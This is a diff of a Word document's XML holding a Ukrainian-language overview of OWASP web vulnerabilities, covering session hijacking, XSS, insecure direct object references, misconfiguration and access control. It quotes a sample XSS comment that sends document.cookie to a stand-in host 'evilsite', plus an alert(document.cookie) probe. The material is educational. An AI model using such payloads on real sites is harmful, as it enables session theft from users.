-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>3. Міжсайтовий скриптинг</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Приклад XSS-атаки</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Якщо Web-додаток дозволяє користувачам заходити на Web-сторінку і розміщувати відгуки, то поле для введення коментаря схильне</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> до</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> XSS-атак. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Нижче показаний приклад коментаря (This is a great product &lt;script&gt; document.write ( '&lt;img scr = http: //evilsite/'+document.cookie&gt;'); &lt;/ script &gt;&gt;), що впроваджує в Web-сторінку XSS -сценарій, який намагається дізнатися ідентифікатор сеансу користувача.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:textAlignment w:val="baseline"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:tab/>
+        <w:t>Друга найбільш небезпечна уразливість в списку OWASP пов'язана з методами аутентифікації і захисту користувальницьких сеансів в Web-додатку. Існує безліч типів цієї уразливості, одним з яких є несанкціоноване використання сеансу.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27712,7 +27621,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>4. Небезпечні прямі посилання на об'єкти</w:t>
+        <w:t>Несанкціоноване використання сеансу</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27738,7 +27647,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Вразливість</w:t>
+        <w:t>Зловмисник може спробувати вкрасти (несанкціоновано використовувати) Web-сеанс користувача, дізнавшись його секретний ідентифікатор. Знаючи секретний ідентифікатор сеансу, атакуючий може представитися Web-серверу аутентиф</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27749,7 +27658,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>, обумовлена ​​наявністю небезпечних прямих посилань на об'єкти, може привести до того, що авторизований користувач Web-додатки може отримати неавторизований доступ до привілейованих функцій і даних. Якщо в коді програми неграмотно або неправильно реалізовані методи роботи з інформаційними об'єктами (наприклад, з файлами, каталогами або ключами баз даних), то користувачі, що не володіють необхідними привілеями, можуть обійти засоби захисту, реалізовані в додатку. Використовуючи цю вразливість, користувачі можуть змінювати значення параметрів таким чином, щоб безпосередньо звертатися до об'єктів, доступ до яких їм заборонено</w:t>
+        <w:t>ікованим</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27760,7 +27669,29 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> користувачем і скомпрометувати його обліковий запис. Якщо додаток недостатньо добре захищає ідентифікатори сеансів (наприклад, відображає ідентифікатори всередині URL-адреси замість використання cookie-файлів), то зловмиснику дуже просто отримати ідентифікатор сеансу, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>обдуривши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> користувача.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27786,7 +27717,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:tab/>
+        <w:t>Навіть якщо Web-додаток зберігає ідентифікатори сеансів в cookie-файлах, зловмисник все одно може отримати потрібну інформацію з локальних файлів користувача, хитрістю змусивши його виконати замаскований сценарій. За допомогою простого сценарію можна витягти ідентифікатор сеансу, що зберігається в cookie-файлі на комп'ютері користувача; наприклад, можна отримати ідентифікатор сеансу за допомогою наступного сценарію, введеного в поле пошуку уразливого Web-додатки: &lt;script&gt; alert (document.cookie) &lt;/ script&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27797,7 +27728,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>5. Небезпечна конфігурація</w:t>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27823,7 +27754,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Небезпечна конфігурація може бути присутн</w:t>
+        <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27834,18 +27765,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">я </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>у всіх компонентах Web-додатки, включаючи платформу (операційну систему), Web-сервер, бази даних або інфраструктуру. Поширеними помилками є запущені без необхідності служби, облікові записи адміністратора з параметрами за замовчуванням, доступне для онлайн-перегляду вміст файлів і директорій. Однак улюбленою темою хакерів є небезпечна обробка повідомлень про помилки.</w:t>
+        <w:t>3. Міжсайтовий скриптинг</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27862,6 +27782,17 @@
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27886,7 +27817,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Виведені додатком повідомлення про помилки, дозволяють зловмисникам краще зрозуміти структуру бази даних і підказують, в якому напрямку краще діяти, які команди і сценарії краще намагатися впроваджувати.</w:t>
+        <w:t>Приклад XSS-атаки</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27912,7 +27843,8 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:tab/>
+        <w:lastRenderedPageBreak/>
+        <w:t>Якщо Web-додаток дозволяє користувачам заходити на Web-сторінку і розміщувати відгуки, то поле для введення коментаря схильне</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -27923,7 +27855,56 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>6. Витік вразливих даних</w:t>
+        <w:t xml:space="preserve"> до</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS-атак. Нижче показаний приклад коментаря (This is a great product &lt;script&gt; document.write ( '&lt;img scr = http: //evilsite/'+document.cookie&gt;'); &lt;/ script &gt;&gt;), що впроваджує в Web-сторінку XSS -сценарій, який намагається дізнатися ідентифікатор сеансу користувача.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>4. Небезпечні прямі посилання на об'єкти</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27949,8 +27930,29 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Web-додаток повинен правильно працювати з уразливими даними і захищати їх. Для запобігання витоку даних в процесі їх обробки, передачі і зберігання необхідно забезпечувати захист на всіх рівнях за допомогою надійних процедур контролю доступу, загальновизнаних криптоалгоритмів і методів управління ключами шифрування.</w:t>
+        <w:t>Вразливість</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, обумовлена ​​наявністю небезпечних прямих посилань на об'єкти, може привести до того, що авторизований користувач Web-додатки може отримати неавторизований доступ до привілейованих функцій і даних. Якщо в коді програми неграмотно або неправильно реалізовані методи роботи з інформаційними об'єктами (наприклад, з файлами, каталогами або ключами баз даних), то користувачі, що не володіють необхідними привілеями, можуть обійти засоби захисту, реалізовані в додатку. Використовуючи цю вразливість, користувачі можуть змінювати значення параметрів таким чином, щоб безпосередньо звертатися до об'єктів, доступ до яких їм заборонено</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27964,7 +27966,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -27985,33 +27987,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7. Відсутність контролю доступу до функціонального </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>івня</w:t>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>5. Небезпечна конфігурація</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28025,7 +28003,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -28035,9 +28013,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Користувачі, що працюють з </w:t>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Небезпечна конфігурація може бути присутн</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -28046,9 +28024,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Web</w:t>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">я </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -28057,57 +28035,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-додатком, можуть мати </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ізні рівні повноважень. У </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>таких</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> випадках базова аутентифікація може не впоратися з тим, щоб не допустити використання користувачами повноважень, функцій і даних, доступ до яких їм заборонено.</w:t>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>у всіх компонентах Web-додатки, включаючи платформу (операційну систему), Web-сервер, бази даних або інфраструктуру. Поширеними помилками є запущені без необхідності служби, облікові записи адміністратора з параметрами за замовчуванням, доступне для онлайн-перегляду вміст файлів і директорій. Однак улюбленою темою хакерів є небезпечна обробка повідомлень про помилки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28124,63 +28054,6 @@
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Якщо захист привілейованих функцій полягає лише в тому, що вони просто заховані в коді програми, то зловмисник, скомпрометував</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>ши</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>обл</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>іковий запис з недостатніми привілеями, може спробувати отримати доступ до закритих функціями (і даними), підбираючи виклики до них.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -28205,18 +28078,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
